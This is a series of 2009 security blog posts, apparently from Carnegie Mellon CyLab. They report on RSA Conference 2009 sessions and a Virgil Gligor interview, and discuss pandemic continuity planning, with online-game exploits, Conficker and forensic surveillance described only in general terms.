Wednesday, April 29, 2009

As WHO Escalates to Alert Level 5, Crisis Management Planning for Pandemics Offers Cyber Challenge

Electron microscope image of the reassorted N1H1 virus. The viruses are 80–120 nanometres in diameter





The WHO has raised the pandemic alert level for the swine flu to five out of six.
Dr. Margaret Chan, the director-general of the WHO, told a Geneva based press conference the world must be prepared.
"All countries should immediately activate their pandemic preparedness plan," she told an international teleconference.
Toronto Star, 4-29-09

As WHO Escalates to Alert Level 5, Crisis Management Planning for Pandemics Offers Cyber Challenges

Those of us responsible for cyber security in corporations and government agencies are also integrally involved in their organizations' business continuity and crisis management planning (and those that are not should be). This evening many such plans are being dusted off and reviewed (and in many instances, it has been far too long since they were last looked at). But there are broader, bigger issues in the fire, and hopefully, no matter what happens in regard to this immediate crisis, these issues will come into sharper focus for many.

Here are three vital areas that offer challenges which can be transformed into opportunities --

Business Continuity and Crisis Management: Most organizations have plans; and many organizations even take such plans seriously. But I argue that the plans of almost all of these organizations are based on the wrong model; i.e., a 20th Century model that says “something bad might happen someday and if it does this it what we will do.” The right model, the new model, the 21st Century model says, “Bad things will happen, and two or more bad things could well happen simultaneously, and when it/they do occur, this is how we will respond and adapt.” This is not just an age of crisis, this is an age in which multiple crises threaten, e.g., climate change, economic and financial crisis, infrastructure collapses, food and water shortages, failed states, terrorism, nuclear proliferation, and yes, pandemics. Such circumstances demand a new model for business continuity and crisis management. (To read an explorations of this and related notions, click here for my CSO Magazine feature A Corporate Security Strategy for Coping with the Climate Crisis.)

Mobility: This is one of Carnegie Mellon CyLab’s seven research thrusts. Indeed, CyLab has its own Mobility Research Center (MRC) dedicated to the exploration of the powerful wave of technological innovation that the term “Mobility” embodies. Once upon a time, organizations were striving to integrate the notions of “Telecommuting” and the “Road Warrior” into their technology/workforce mix. The model for “Telecommuting” was of a certain percent of employees sitting at desktop computer at home instead of at the office; the “Road Warrior” model projected a sales force with laptops slung over their shoulders and cell phones held to their ears. But both models have been subsumed by a broader, more transformative notion of “Mobility.” This broader, more transformative notion has been articulated by Martin Griss, Co-Director of the CyLab MRC as “anywhere, anytime computing.” Such a model has sweeping implications not only for business continuity and crisis management; it means moving beyond planning that is centered on just flipping the switch at a hot site to planning that also includes re-establishing a virtual workplace via diverse mobile platforms, devices and applications. It also has sweeping implications for healthcare, and yes, emergency healthcare in particular both in the workplace and in the home. (For more on Mobile Healthcare, click here for a summary of CyBlog posts on CyLab MRC’s Mobile Healthcare Workshop in February 2009.)

Awareness and Education: Most organizations have some security awareness and education program in place; although many of these programs are uninspired and under-funded (which is very short-sighted, because money spent on awareness and education can go along way, and have a great impact on the workforce and the workplace, if it is spent wisely.) But to whatever extent your organization has a security awareness and education program, you have a delivery system with which you can reach your workforce and by extension their families, friends and neighbors. That means that you have the opportunity to disseminate information related to public health, environmental protection, emergency preparedness, etc. to your workforce and by extension to their families, friends and neighbors. Doing so not only constitutes an excellent form of public service, it also reinforces your organization’s messaging on security awareness and education by placing that messaging and the delivery system which communicates it into a positive, life-affirming framework of common good.

Hopefully, the threat of a Swine Flu pandemic will come and go without great loss of life or significant economic hardship. But let us also hope that whatever happens this time, the challenges it reminds us of will be turned into advantages by those cyber security professionals responsible for developing 21st Century programs for corporations and governments, and those cyber security technologists responsible for designing 21st Century products for the IT industry.

-- Richard Power

Sunday, April 26, 2009

Silver Bullet: Gary McGraw Interviews Virgil Gligor on Software Security and Other Vital Issues


Software security will be with us forever, as far as I am concerned; and I will tell you why, software is by and large a creative process. Don’t let anybody tell you that formal method will account for any more than 10-15% of software development. It hasn’t happen in the last thirty plus years, and it probably will not happen in the future either. Virgil Gligor, Silver Bullet Security Interview with Gary McGraw, 4-21-09

Silver Bullet: Gary McGraw Interviews Virgil Gligor on Software Security and Other Vital Issues

Maybe you are a veteran of many digital wars. Maybe you are a fresh recruit to the virtual corps of info warriors. Maybe you slog on at the frontlines of corporate culture. Maybe you press the cutting edge in a lab at the other side of tomorrow. Maybe you operate out beyond enemy lines in the shadow world of the electronic underground. Whatever your level or circumstance, if you find yourself passionately engaged in the continuum that is cyber security, it is vital that you glean what you can from the experience and insights of others, whether they are along side of you or ahead of you on this treacherous trail into the future.

So I encourage you to spend twenty-seven minutes listening to this podcast of Gary McGraw’s interview with Virgil Gligor. You will benefit from this rich dialogue between thought leaders from two generations, who are both still very much on point, and you will gain invaluable perspective on some of the critical issues that confront us.

Gary McGraw, Chief Technology Officer (CTO), for Citigal Group, is a globally recognized authority on software security and the author of six best selling books, including Exploiting Online Games (2007). McGraw is also editor of the Addison-Wesley Software Security series and produces the monthly Silver Bullet Security Podcast for IEEE Security & Privacy magazine.

For decades, Virgil D. Gligor, Professor of Electrical and Computer Engineering at Carnegie Mellon University and co-director of Carnegie Mellon CyLab, has been a leader in the field of cyber security research, with interests ranging from access control mechanisms, penetration analysis, and denial-of-service protection to cryptographic protocols and applied cryptography, and be served in senior advisory roles for technology leaders, as well as the US government and the global cyber security community.

In this brief, but far-ranging interview McGraw and Gligor touch on a broad range of issues including the need for what Gligor and CyLab term “usable security," the fate of virus scanners, the state of electronic voting, the future of the Foreign Intelligence Surveillance Act (FISA) and even how Gligor’s experience of growing up in the Romania of the communist dictator Nicolae Ceau┼čescu helped inspire his contribution to the field of cyber security.

-- Richard Power

Here is a transcribed excerpt followed by a link to the full podcast:

McGraw: My own work focuses on Software Security, where I think we have made some tangible progress.

Gligor: Oh, absolutely.

McGraw: I have been tracking the software security space for several years running, and in 2008, revenues from tools and services companies passed $450 million, so that’s exciting, that’s when the middle market begins to emerge, and analysts come in and start covering the space. Do you think that Software Security is here to stay?

Gligor: Software security will be with us forever, as far as I am concerned; and I will tell you why, software is by and large a creative process. Don’t let anybody tell you that formal method will account for any more than 10-15% of software development. It hasn’t happened in the last thirty plus years, and it probably will not happen in the future either.

McGraw: Especially in the US.

Gligor: Well, anywhere. So let’s admit to that fact. No matter what we academics would like the world to be, the world is not that way, in the sense that formal methods have had minuscule penetration so far. But things are improving. Starting from that premise, there will always be bugs; consequently there is always going to be room for improvement in the software development process, because it is a creative endeavor. So what engineering does is actually help mitigate the consequences of the errors introduced, of course, because our creativity sometimes exceeds our ability to do things correctly. But I believe from that perspective that software security, as a discipline, is extremely important. By the way, at Carnegie Mellon, you don’t see a single course called Software Security, but we teach it in all of our courses. It starts from Introduction Security, and goes to Network Security, and then it goes to Systems Software Security, and on and on. As a matter of fact, even in Applied Cryptography, we talk about software security. ... Also, we have the benefit of having the Software Engineering Institute (SEI) and the Institute for Software Research (ISR) and of course the Computer Science Department teaches a number of courses in the security aspects of software. Model checking, which is the only formal or semi-formal method applied on larger scale is being taught [here at Carnegie Mellon University] by one of the most recent Turing Award winners, Ed Clark.

McGraw: So when I was starting in the computer field some twenty-three years after you were starting in the computer security field, I was at a meeting at NIST where we were bemoaning sharing information about actual exploits when someone stood up and there was some guy there, [saying] “Oh, software security is like a fad, its kind of like a sign wave, it comes and it goes, and it’s just come again, but it is going to go again.” You don’t believe that?

Gligor:I don’t believe any of that, but I can explain where it came from …

McGraw: Please do. I’ve always wondered.

Gligor: In the early days the idea was that we could build security kernels, which were formally verified, in other words, the software security of this kernel was assured formally. But these kernels were very small. The thought was that if we had these small kernels that were formally verified, then the applications and the rest of the operating system software could have as many bugs as possible and it would do no damage to the system. Of course, I am exaggerating this view to make a point, but essentially that was the view; and that view, unfortunately, never materialized.

McGraw: It seems like there is a ripple of that view in this notion of security co-processors in laptops, etc.

Gligor: Well, security co-processors help to actually check things faster. They helped to a significant extent to make security usable from a performance point of view. But, basically, doing all sorts of traces, and checking traces, and backing up computations essentially turn out to be good band-aids.


The Silver Bullet Security Podcast can be played online or downloaded from Citigal.

Friday, April 24, 2009

RSA Conference 2009: Summary of Posts


RSA Conference, Friday, 4-24-09

I will be blogging from some of the leading industry conferences, as well as from some of CyLab's own conferences and workshops throughout the year. You can check out the schedule in the right-hand column of this site, under the heading, "CyBlog on the Road." -- Richard Power

Here is a summary of CyBlog posts from RSA Conference 2009, in chronological order:

RSA Conference 2009: "Imagination is More Important than Knowledge" (Albert Einstein)

RSA Conference 2009: Elgamal Strikes Poignant Note, Coviello and Salem Paint in Bold Strokes

RSA Conference 2009: World-Class Cryptographers Muse on Cloud Computing and Mushroom Clouds

RSA Conference 2009: Analysts Sifting Thru the Rubble of the Economy, Address the State of the Security Business

RSA Conference 2009: Notes on Complacency and the "Smoking Gun" from BT's Briefing Luncheon

RSA Conference 2009: Melissa Hathway -- "Security is a Marathon, and It is an Uphill Run"

RSA Conference 2009: Want to Play a Game? Gary McGraw & Expert Panel Explore the "Edge of Technology"

RSA Conference 2009: Bank InfoSecurity Issues Its 2009 Survey Results -- Lessons Learned or Unlearned?

RSA Conference 2009: Digitial Forensics? E-Discovery? "Many judges still don’t know the difference between a Mega-Byte and a Dog Bite."

RSA Conference 2009: Digitial Forensics? E-Discovery? "Many judges still don’t know the difference between a Mega-Byte and a Dog Bite."

Lawrence Dietz (standing), Jonathan Tal (sitting)

RSA Conference 2009, Friday, 4-24-09

Combining video surveillance with data forensics could be decisive in legal cases involving e-discovery, but there are complex issues involved. And in "Case Study; Video Data Security Convergence," Jonathan Tal and Lawrence Dietz of TAL Global Corporation shared some invaluable insights on some of them.

"Many judges still don’t know the difference between a dog bite and a mega-byte,"
incontrovertible video evidence goes a long way to making your case."

When should you employ combined data and video investigations?

Dietz and Tal suggest the following circumstances:

When the suspect is known to you
When you believe it is important to be able to place an individual on a device at a certain time and match that individual with the device's activity
When you can physically limit and control data entry points

But of course there are legal and privacy concerns:

Are the computers to be monitored in a public place?
What is expectation of privacy in the location where the video is taken?
Have employees and others consented to video and data monitoring?
Will data or video evidence be used in legal proceedings?

Dietz and Tal stressed that there is a difference between recording sound and video versus recording video only; if you record sound then wiretap laws kick in.

Where you conduct such surveillance is also an issue; e.g., conference rooms and reception areas in the workplace are different from bathrooms in the workplace. In a bathroom, there is a reasonable expectation of privacy.

Also, be careful to avoid accidental disclosure of medical records. In this investigation, the hidden video camera was positioned to only see the person sitting at the workstation, not what was on the screen.

Tal framed the case study they offered in their presentation.

"Once upon a time in a hospital not very far from here there was a bad doctor, a cardiologist, and he was practicing bad medicine he was not only cavorting with the nurses, but endangering the patients. He was experimenting on patients, and the hospital took exception, and said you no longer have the right to do these experiments in our hospital. He launched a law suit, and started a campaign against the hospital. During the course of his campaign, he began generating information about procedures other doctors were using in the hospital, and was exploiting this information in his suit. The hospital was concerned, patient information was leaking, and this bad doctor’s attorney was using this leaked information. Where and who is leaking this information leaking from? The human side of our investigation narrowed it down to a few people who were close to the bad doctor, and we zeroed in on one doctor who was a good friend of the bad doctor. Now this good friend of the bad doctor often went to the doctor’s lounge in the hospital."

Dietz picked up the story from there.

"There were four computer workstations in this room. There was unauthorized access, but we didn't need to prove just that, we needed to prove who was doing it, whose is sitting at the workstation at the moment that the unauthorized access it taking place. Of the four workstations there were two thin clients and two PCs. We went in disguised as workmen. The cover story involved an overflowing restroom. When you are dressed like a workman, people tend to ignore you, particularly in the hospital environment, where there is a heavy caste system. You want to keep the number of people who know what you are doing as small as possible. We installed one hidden camera inside a particular pillar, one that gave us a view of all four workstations. The fewer cameras the better, less tape to review. Recording was activated by motion detection. We ran an Ethernet cable to a Digital Video Recording (DVR) lock box. The power for the camera also came from the Ethernet cable. The box held approximate thirty days storage of digital video recording."

Dietz also highlighted some planning stage issues.

"Secure communications between client site IT manager, and the data and video engineers is an important issue to address, so are your remote management capabilities. Both need to be coordinated ahead of time. You also will want to have an agreement in place on what is to be reported and to whom. There should also be prior agreement on if, when and how to destroy the video and forensics evidence. Not to mention level setting for expectations as to time and cost beforehand. You will also want to establish periodic checkpoints to review evidence and assess possible actions.

It is still early on in the evolution of digital forensics, e-discovery and related skills and processes. Clearly, there is a lot of opportunity both for technological innovation and the training of professionals in law, law enforcement and security.

-- Richard Power

RSA Conference 2009: Bank InfoSecurity Issues Its 2009 Survey Results -- Lessons Learned or Unlearned?



RSA Conference 2009, Friday, 4/24/09

Bank InfoSecurity conducts an annual survey. The respondents are largely senior management in the banks and credit unions. The results of this survey are always of interest, particularly this year.

In presenting the 2009 survey results for the first time, this morning, Tom Field, Editorial Director for the Information Security Media Group, which publishes Bank InfoSecurity, began by painting the grim backdrop --

Bear Stearns, Washington Mutual and Merrill Lynch are gone.

The Dow Jones average has dropped below 7K.

In 2007, there were only five financial institution failures in the US. In 2008, there were 40 in the US. But in 2009, as I write this in the first month of the second quarter, there have already been 27.

The Heartland case, on the heels of the TJX and Hannadford cases, has made an impression the collective psyche.

So has the Bernie Madoff case, perhaps the biggest fraud in history.

Yes, hard times have come, along with a new administration in Washington, D.C. (one inclined to refine and revive regulation).

So what does Bank InfoSecurity's survey indicate:

Here are a few of the important data points that Field touched on in his presentation:

Respondents are reporting reduced budgets, reduced staff and reduced resources. But they are also reporting increased attacks, insider risks and an increased need to outsource.

57% of respondent reported budgets being level-funded (i.e., "frozen)
26% reported the biggest impact of the economic conditions as reduced budget
19% reported increeased phishing
18% reported increased attacks

In other words, in the wake of what Field characterized as an "Economic Tsunami," I would suggest that the sharks shown up and cholera has broken out.

When asked what security concerns would likely to be the main focus in 2009:

28% said risks associated w/ third-party service providers
22% said mobile users devices
18% said insider fraud

It was also fascinating to hear the financial sector spin on the aftermath of Heartland.

According to Field, "institutions no longer willing to silently replace cards every time someone else’s system gets breached." He quoted one $275 million institution that had one thousand credit cards on the list, calling for all of the US financial institutions in this country to get together and say, "Not on our time, not on our dime."

What has been impact of Heartland-type data breaches?

29% reported financial impact
20% reported productivity loss

But when asked what their institutions intend to do to help prevent these breaches, the significant data points were curious to me --

34% said "educate customers"
29% said "join industry group"
20% said "lobby lawmakers"

From a security perspective, these three actions are not going to make a significant impact on risks issuing from third-party service providers. These actions look more like a public relations efforts, and a cover your rear effort.

In regard to the issue of vendor management, i.e., overseeing those third-party service providers, the numbers are also not reassuring:

When asked if they require that an independent third party assess your vendor’s security controls, only 36% said yes, and 15% said no, while another 38% said that they did so but only in regard to some vendors.

That is not good enough. That is the data point that should be moving upward fast.

But then again, those who know point their fingers at the third-party service providers that they have outsourced to are the same people who blew off security professionals who raise serious concerns about the blind drive toward outsourcing in the beginning.

The push back then was that security was not going to be compromised, and that there would be contractual safeguards in place. Yada yada yada.

But, of course, that is a little too much context in a sector that only hears what it wants to hear.

Looking forward, Field identified mobile banking as a key initiative being funded, and a critical one in the hunt for younger customers.

When asked if they will be offering mobile banking in 2009?
35% reported yes
5% reported maybe

It should be another interesting year, in more ways than one.

The full survey will be available from Bank Info Security soon, and I recommend it to you. Lots of food for thought

-- Richard Power

Thursday, April 23, 2009

RSA Conference 2009: Want to Play a Game? Gary McGraw & Expert Panel Explore the "Edge of Technology"



"What we are talking about is the future of software security." Gary McGraw, Citigal

RSA Conference 2009, Thursday, 4-23-09

Exploiting Online Games


This morning, as I headed to the session I had chosen to attend for that segment of the day, I noticed it was one of three sessions lined up along the same wall. One session was standing room only. The other two were two-thirds empty.

The standing room only session was on “Seven Most Dangerous New Attack Techniques and What’s Coming Next,” the other sessions, the ones not even half-full, were on “Virtualization Security” and “Exploiting Online Games.”

This observation offers us some insight into one of the great challenges in the security space. How do you look over the horizon or beyond the obvious when what is right in front of you, and what is painfully obvious, are simply overwhelming?

Some of the thorniest problems coming down the pike will relate to security of virtualization and virtualization of security. Some of the most intriguing exploits and hacks coming down the pike will come from the world of online gaming.

But the majority of attendees, as well as they should, were streaming into the session that might help them fight some of the biggest fires that are burning in their environments right now. How do you ever get ahead of the curve if you are always struggling even stay current?

I was on my way to the session on exploiting online games. (NOTE: CyLab corporate partners can read more about the security issues raised by the trend toward virtualization in my September 2008 Intelligence Briefing on “The Shadow Side of Virtualization.’)

Gary McGraw
, CTO for Citigal, moderated the panel.

Participants included Greg Hoglund, CEO of HBGary, attorney Sean Kane of Drakeford and Kane, Aaron Portney, a security researcher with TippingPoint and Avi Rubin, President of Independent Security Evaluators.

In his opening remarks, Gary McGraw welcomed the scattering of attendees to the “edge of technology,” and declared “what we are talking about is the future of software security.” There are so many people out on the exhibit hall floor hawking the so-called Cloud, “even though they have no idea what it means.” But online games are massively distributed systems. “They put nine gigabyte globs in everybody’s box.”

“Virtual worlds have virtual stuff that is worth actual money, which means if you can figure out how to cheat you can make money,” McGraw continued.

“Also, the law is abundantly unclear (and dang interesting). Imagine you set up a bank in Second Life and told them you were going to pay them interest, and then you stole all the money. Those regulators who don’t regulate banks very well don’t regulate virtual banks at all.”

Noting that there are 17 million people (at least) playing online games, McGraw further suggested that drawing attention to this area of security is a way to engage and hopefully enlighten a broader audience.

“I am certain that there are not 17 million geeks in the world, so there are a lot of normals playing online games. They do not care about security; they just want to play the game. But when someone cheats them that irks the hell out of them. So this is an interesting way to start a conversation about security with normals.”

McGraw also provided some monetary context for the issues involved, e.g., one game, World of Warcraft (WoW) has 14 million subscribers, and that each one pays $14 per month. Well, $14 per month x 10 million subscribers = $240 million per month, and $240 million per month x 12 months = $1.6 billion per year.

"There is also a healthy middle market exists for pretend stuff."

Globalization is second-nature to online gaming, and to exploiting it as well. Indeed, the exploiting of online games is an element of the global economy. And just as cyberspace and the global economy interpenetrate, the "virtual economy" of the online games and the "real" economy of the global marketplace interpenetrate as well.

According to McGraw, in China, over 500,000 people “farm” Massively Mult-player Online (MMO) games, e.g., farming "Gold" for WoW.

"You can pay somebody to play the game for more than they could make working for Nike."

Next up, Greg Hoglund outlined the two ways in which online gaming is attacked or its resources misappropriated: exploits and bots.

Exploits can be used to duplicate items needed for the game, including gold, or to "see stuff you're not supposed to see."

Both AFK (i.e., away from keyboard) and non-AFK bots are used to perform legal input, but in an automated fashion. They can work for keystroke and mouse movement, which require taking over the GUI and also a dedicated computer, among other things, or to thread highjacking, which allows you to call internal functions within a game directly, eliminating the need for macros.

The panel's legal expert, Sean Kane gave thumbnail sketches of the issues involved in two court cases relevant to the exploiting of online games.

Bragg v. Linden Research, was based on a Second Life player'a use of hacking to purchase virtual land at less than its market value. The company's User License Agreement (ULA), which the judge determined was draconian, a settlement was reached, and the player's user account was returned.

MDY Industries v. Blizzard Entertainment was based on a third party developer's marketing of software that automated play and leveling in WoW.

$6 million in damages were awarded to Blizzard. The case is in Appeals Court.

According to Kane, the "top two threat families on Microsoft's detection and removal list are online game password stealers."

'As offenders become more organized," Kane concluded, "and their operations scale up rapidly, all industry participants must strive to establish protections for their users and game spaces both in code and in law.”

Like Hoglund, Aaron Portnoy focused on the how and what of online game exploitation, citing his own experience.

"We focused on Disney's Pirates of Caribbean -- written in a dynamic language called Python -- to the point where we had full source code within a couple of days of downloading it. They distribute all the client code on your computer."

Portnoy could change the height his character could jump from 4 feet to four hundred feet, he could also alter levels on the speed of ships or power of weapons.

McGraw interjected, "Many developers and architects don’t think about trust boundaries at all. They put it all on this guy’s computer," pointing to Portnoy, "and expect him not to look under the hood."

"I changed the speed on my ships, I ended up with a line of kids on the dock, waiting for rides. All the other ships were much slower ..." Portnoy added, "I could play Jesus by walking on water. And my guy’s walking speed was faster than the sailing speed of everybody else's ships, so I could track them down over the sea and just shoot them."

Portnoy was banned from all Disney.com sites.

The letter is framed on his wall.

In his remarks, Avi Ruben stressed the importance of identity management.

"In gaming as in other domains, it is important to be able to manage real world identities. Many attacks are possible if people can create fake identities."

Rubin gave to two fascinating examples of how using a Sybil attack, i.e., being able to have multiple identities, while playing online poker could facilitate cheating.

For example, if you are holding two pair in Texas Hold 'Em, if one of the four cards comes up you could get a full house. One of four out of forty six cards. But if you using a Sybil strategy, you put other players in the game, you can increase your chances of winning significantly.

Of course, as Rubin noted in closing, "solving identity management will solve some but not all of the problems. Guys could still get on the phone and share their hands, and the winnings."

I am grateful I had the opportunity to spend an hour "at the edge" with McGraw and his colleagues.

-- Richard Power

Wednesday, April 22, 2009

RSA Conference 2009: Melissa Hathway -- "Security is a Marathon, and It is an Uphill Run"

The White House's Melissa Hathaway speaks at RSA Conference 2009


RSA Conference, 4-22-09

No, Melissa Hathaway did not disclose the findings of the 60-day review of US national cyber security ordered by President Obama and delivered to him recently. Although from the influx of media in the hour or so before her hastily scheduled remarks during today's afternoon keynote session.

We will have to wait until after Obama and his team have reviewed its contents, which certainly seems reasonable. It is after all an encouraging sign that an incoming President confronted with so many daunting challenges would have even thought to order such a sweeping and swift review.

But in her brief and heartfelt remarks, Hathaway did seem to more than hint at one important finding, i.e., that the White House must lead. Because cyber security is a national security issue, and no single agency in government could possibly oversee it for the whole of the government, the leadership must be centered in the White House. That is (or will be) as it should be.

If only more corporate leadership would recognize the need for robustness in the governance of enterprise security. (For more on this vital issue, download a copy of the CyLab Governance for Enterprise Security Survey.]

-- Richard Power

RSA Conference 2009: Notes on Complacency and the "Smoking Gun" from BT's Briefing Luncheon



RSA Conference, 4/22/09

At BT's RSVP briefing luncheon, held off-site at Lulu's on Folsom Street, Bruce Schneier, BT's Chief Security Technology Officer (and industry icon), spoke on "Cyber Security Risks for 2009 and Beyond."

And what did Schneier see as the biggest risk this year and next?

Complacency.

He used the recent Conficker story to framed his remarks:

"Conficker was a huge media story in the run-up to April 1st. It pressed many of the fear buttons: no one knew what it would do, no one knew where it came from, it has a weird name and weird names make people afraid, it was big and it was magnified in the press. Everyone selling security or writing about security spun it. And then nothing happened. It was a 'Boy Who Cried Wolf' story. Of course, something did happen. It updated itself five days later. But that was not as good a news story.

"Stories that make good news often aren't real risks. There was nothing about April Fool's Day that made any difference. The press does not do any of us any favors by writing these stories. Fear mongering leads to complacency.

"Real risks are usually much more pedestrian. For example, the kind of cyber fraud and cyber espionage we see every day. If it is in the news, don't worry about it. If it is so common its not in the news anymore, then it's something that we all have to worry about."

But Tim Le, BT's Director of Research and Technology for its Managed Security Services (MSM) followed Schneier with some other "Lessons Learned from the Conficker Triple Threat."

According to Le, BT sent out one thousand alerts about Conficker, but only 10% of Conficker incidents were detected by client intrusion detection systems (IDS).

Why?

Conficker utilized evasion capacities that had not be seen before - in cyberspace. Conficker infected systems via USB keys and via mobile users. Conficker maintained a low profile; for example, unlike Slammer or Code Red, Conficker had sleep cycles, and only scanned 100 times an hour (instead of thousands) so as not to trigger IDS. It also had a selective payload delivery mechanism, i.e., it scanned first and did not deliver unless it detected the vulnerability it was looking.

IDS, Le cautioned, look for a "smoking gun." Well, in the physical world, you rarely get a smoking gun, Le added, it is more likely that you will have to build a case with circumstantial evidence. And just as in the physical world, in the digital world you rarely get a smoking gun either. MSM can look for the circumstantial evidence.

How?

By "logging broadly, and analyzing deeply." Le concluded with a very sobering admonishment, "Assume your IDS will not see an initial attack."

A persuasive argument for MSM?

Richard Power

RSA Conference 2009: Analysts Sifting Thru the Rubble of the Economy, Address the State of the Security Business


RSA Conference 2009, 4/22/09

In a panel discussion on the "State of the Security Business," several leading industry analysts held forth on what is ahead in 2009 and 2010.

Just as in every other walk of life, the current global economic instability is significantly impacting even savviest of people's ability to see beyond yesterday and today, at least without any degree of confidence.

Nevertheless, there were some take aways:

Panel moderator, Sarah Friar, lead software analyst for Goldman Sachs, led of with some projections: global IT spending down 9%, software spending down 5% and based on a recent CSO survey, security spending down 2%.

"Although the US and Israel have dominated the security market hitherto," John Pescatore, Gartner's lead analyst for Internet security suggested that as we pull out of this slide in 2010, "there are powerful reasons for increased global competition," and therefore, "growth in the security market is not going to be rflected on NASDAQ."

Chris Christiansen of IDC provided some clarity in the frenzy of hyperbole swirling around "Cloud computing," he encouraged people to think of the "Cloud" as infrastructure, and SaaS as applications.

Nick Selby of 451 Group remarked that "people are under seige in large organizations," and that he was "starting to see collaboration in independent groups that would never have collaborated even a few years ago." For example, Selby added, as malware is increasingly targeting specific industries, "nanks and pharma are looking proactively at attacks, before they are hit."

-- Richard Power

Tuesday, April 21, 2009

RSA Conference 2009: World-Class Cryptographers Muse on Cloud Computing and Mushroom Clouds

Nagasaki, 8-9-45
Notes from the Keynote Session (Continued), RSA Conference 2009, Tuesday 4-21-09

Well, however the tale of the Cloud plays out in the end; it is definitely providing a lot of fodder for the best and the brightest.

At this year's iteration of the legendary RSA Conference Cryptographers Panel, there was provocative discussion of the Cloud:

Whitfield Diffie, Vice President, Fellow and Chief Security Officer of Sun Microsystems, said he is "bullish on Cloud computing" and that it is the type of challenge "seen not more than twice before" in the space.

But Adi Shamir, Professor of Computer Science at the Weizmann Institute of Science in Israel, is "very worried about it." According to Shamir, we risk trading in "many small disasters for one big catastrophe."

"Now that we are possibly moving into the cloud," he elaborated, "we are facing a real danger of a hacker taking out one data center to catastrophic effect."

True to his studied stance, Bruce Schneier, Chief Technology Officer, BT Counterpane, said he is "bored with cloud computing." Although it is presented as new paradigm, Schneier explained, "fundamentally, I do not see many differences, it is still about trust, it is a continuation of what we have been seeing."

And although he described himself as "enthusiatic" over it, Ron Rivest, Viterbi Professor of Electrical Engineering and Computer Science at MIT, poked fun at the endearing term, "Cloud computing," and suggested that "Swamp computing" might be more appropriate. Rivest also encouraged the attendees to consider the possible analogy with the differentials craze that led to the current global financial crisis; in both instances, CEOs are deriving benefits while off-loading risks, but that there could be similarly severe consequences.

But from my perspective, Martin E. Hellman, Professor Emeritus of Electrical Engineering at Stanford stole the show.

Hellman is working on the dangers of a very different kind of cloud.

Hellman asks, "How risky is nuclear deterrence?" "1100 times riskier than having a nuclear power plant near your home," he posits.

He encourages the audience to do a Google search on "Hellman cryptography nuclear" to drill down into his current work, and also gave out the URL for his site, nuclearisk.org

He characterized the human race as possessing the physical powers of a god with the psyche of a 16 yr old boy. If we do not "grow up really fast and pay attention to risks before they become obvious," we face calamity beyond comprehension.

"Trial and error are not enough, we have to rely on forecasting ability."

Hellman drew from the example of the current global financial crisis.

There were repeated warnings about derivatives, he recounted; Sen. Bryan Dorgan (D-ND) in 1994, Brooksley Born of the CFTC in 1998, and Warren Buffet, who sounded the alarm about "financial weapons of mass destruction' in 2002.

Society, Hellman noted, never seems unable to recognize risks until it is too late, and he cited nuclear weapons proliferation, the economic crisis and data security as prime example.

"We risk being called Cassandras," he acknowledged, but exhorted the audience not to be dissuaded by this inevitability, because "Cassandra was always right."

-- Richard Power

RSA Conference 2009: Elgamal Strikes Poignant Note, Coviello and Salem Paint in Bold Strokes



"Those who dream by day are cognizant of many things which escape those who dream only by night." Edgar Allen Poe

Notes from Keynote Session, RSA 2009, Tuesday, 4-21-09: Elgamal Strikes Poignant Note, Coviello and Salem Paint in Bold Strokes

This RSA keynote session opened with a documentary short film tribute to the 19th Century storyteller Edgar Allan Poe, a writer of "brave imagination willing to venture into the dark parts of human nature to illuminate the truth on the other side." Of course, Poe also had a keen interest in cryptography.

Legendary, Egyptian cryptographer Taher Elgamal was honored with the RSA 2009 Lifetime Achievement Award. In his moving remarks, accepting the award, Elgamal expresses joy and wonderment. “The thing about this industry,” Elgamal remarked, “is that it is fun, we get to deal with mythic creatures like Trojan Horses and Zombies.” Elgamal also shared a poignant insight into his inner life. From childhood, he said, he was in love with numbers, and believed for many years that the world was ruled by “one massive equation,” but now he said, he has come to realized that “whether or not the equation exists, it is the journey that matters.”

In delivering the opening speech of the Tuesday keynote session, Arthur Coviello, Executive VP of EMC, and President of RSA, EMC’s security division, declared: “The vendor community must take lead in building secure, robust eco-system.”

Coviello talked of security being on the verge of one of those tipping points where evolution turns into revolution; and he suggested that the “decoupling” of policy management from the individual security point products was the real breakthrough that would lead to the overcoming of the criminal threat?

In the next speech of this keynote session, Enrique Salem, President and CEO of Symantec, declared “operationalizing security” the overriding imperative.

Salem described security managers as tired of being “system integrators” and fed up with “silos.” “It is time to change the way we do security,” Salem said, “it is time to operationalize security.”

“It is possible to have an integrated solution that drives security across your entire environment,” Salem promised, “a solution that is risk-based, information-centric, responsive (i.e., situation-aware) and workflow-driven.” Automating manual processes and bridging between silos, Salem added, are key elements.

Some thoughts on the speeches of Coviello and Salem:

Surely we all can embrace both the vision of building a “secure, robust eco-system” and the role that “operationalizing security” would play in fulfilling such a vision.

But is it optimal, as Coviello suggests, that “vendors must take the lead” in the effort to create this eco-system? This is a topic worthy of serious reflection.

Certainly, the vendor community has the profit-motive, the resources, etc., certainly the vendor community would have to develop and sustain vital elements of such an eco-system; but should they -- can they – lead the effort to create it? It is not at all clear that it is the vendor vision that should dominate, and the vendor agenda that should dictate.

What of the other co-creationists, e.g., government, academia, industry sectors and citizen groups?

There are many blind spots from each of these perspectives. How can we collaborate to overcome them with a unified field of collective vision?

These should be open questions. But the forward momentum may simply over-write such questions. Market forces, like nature, abhor a vacuum.

Another observation, not only on these two keynotes, but on much of the collateral and sales pitch out there on the threshing floor of the Expo, there seems to be a preoccupation with the threat of “fraudsters” and “identity thieves.”

Well, in the 1990s, the conventional wisdom was that the biggest issue was the insider threat and that most of the rest of it was juvenile hackers. Both the threat of criminal hacking for profit, and the high-grade threat from corporate or state-sponsored spies were being paid insufficient attention.

Is the high-grade threat still being paid insufficient attention?

-- Richard Power

Monday, April 20, 2009

RSA Conference 2009: "Imagination is More Important than Knowledge" (Albert Einstein)

First page of Einstein's manuscript explaining general theory of relativity


CyBlog on the Road: RSA Conference, Monday, 4-20-09

The provocative words of Albert Einstein hung from a banner over the escalators that led down into RSA Conference 2009: "Imagination is more important than knowledge."

Of course, coming from Einstein, such a statement presupposes a strong, almost supernatural baseline of knowledge upon which to launch out into imagination.

And certainly, by "imagination" Einstein did not intend flight into self-indulgent fantasy; he meant to break through the limitations of the known and tap into the unknown to solve the problems of the known from the other side.

Well, bravo for RSA's choice of motto for its "Innovative Sandbox," which was the highlight of the first day of the 2009 conference.

"Innovative Sandbox" was billed as a "half-day, interactive workshop program" through which attendees could "explore and shape technologies that promise to transform the information security industry." It featured brainstorming sessions, complete with whiteboards, facilitated by industry luminaries, and a "Most Innovative Company" contest presided over by an expert panel.

